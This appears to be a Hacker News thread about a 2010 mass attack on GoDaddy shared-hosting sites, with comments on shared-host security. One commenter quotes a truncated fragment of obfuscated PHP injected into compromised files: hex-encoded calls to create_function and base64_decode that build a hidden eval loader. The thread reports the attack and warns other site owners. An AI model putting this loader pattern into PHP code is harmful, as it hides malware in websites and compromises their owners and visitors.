

Attacks on GoDaddy shared sites - insomniaboldinfoorg - fseek
http://blog.sucuri.net/2010/10/attacks-on-godaddy-sites-insomniaboldinfoorg-com.html

======
dangrossman
Just about every shared host is under attack at all times. Servers where
thousands of people run old versions of widely used open source software
(blogs, CMS's, contact forms, etc) are such easy targets for exploiting known
security flaws.

Aside from not using shared hosting at all, at least don't use shared hosting
provided by a domain registrar. The combination of supporting millions of
customers and hosting not being their primary business means hosting MUST be
treated as a commodity for them to offer it at all. They're not going to have
the people bandwidth to help customers clean up their sites after they're
hijacked.

------
uurayan
As a former GoDaddy hosting customer, let me tell you all that these attacks
are not new business. There was a point in May where our sites were attacked
weekly with massive damage done. We would perform all the fixes they
recommended yet the next day our site would be hacked to crap again. It is
obviously a huge vulnerability on their side (from what I remember it was with
their phpmyadmin implementation) yet all they did during this time was blame
their customers saying it was security flaws in the php software installed by
their customers.

Stay away from Godaddy hosting at all costs.

------
fseek
Another one of those "mass" attacks on GoDaddy started today.

The blog doesn't give any numbers, but it seems that a few of their shared
servers were compromised, so a few thousand of sites at least.

One of my clients still host in there and her files were all modified around
1pm today.

What I find unusual is the kind of code added to all PHP files:

" $_8b7b="\x63\x72\x65\x61\x74\x65\x5f\x66\x75\x6e\x63\x74\x69\x6f..
\x6e";$_8b7b1f="\x62\x61\x73\x65\x36\x34\x5f\x64\x65\x63\x6f\x64\x65";..
$_8b7b1f56=$_8b7b("",$_8b7b1f("aWYoZnVuY.. "

If you decode that, it is an encoded "eval(base64_decode" to load the malware
as hidden as possible.

